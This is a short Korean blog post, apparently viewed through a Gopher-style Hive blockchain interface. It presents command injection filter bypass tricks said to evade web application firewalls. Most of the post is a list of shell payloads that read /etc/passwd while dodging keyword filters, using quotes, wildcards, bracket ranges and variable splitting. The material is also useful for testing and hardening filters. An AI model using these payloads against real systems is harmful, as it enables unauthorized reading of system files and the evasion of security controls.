___  ___    _ _    _  _ _____   _____
 / __|/ _ \  | | |  | || |_ _\ \ / / __|
| (_ | (_) | |_  _| | __ || | \ V /| _|
 \___|\___/    |_|  |_||_|___| \_/ |___|

 --- A GOPHER-LIKE INTERFACE FOR HIVE BLOCKCHAIN ---

Command Injection filter bypass

BY: @ss5h | CREATED: Jan. 29, 2018, 8:41 a.m. | VOTES: 1 | PAYOUT: $0.00 | [ VOTE ]

커뮤니티에 와일드카드를 통한 커멘드 인젝션 필터에 관해서 글이 올라왔는데 이뿐만 아니라 waf 일반적인 웹 방화벽에서 탐지하기 힘든 bypass 방법이다.

cd /etc/ ; cat passwd
cat /etc/passw"d"
cat /etc/passw?
cat /etc/passw*
cat /etc/passw'd'
cat /etc/passw[a-z]
a=pas;b=swd;cat /etc/$a$b

TAGS: [ #command ] [ #injection ] [ #hacking ] [ #bypass ] [ #waf ]

Replies

NO REPLIES FOUND.

[ BACK TO TRENDING ] [ BACK TO MENU ]
CMD>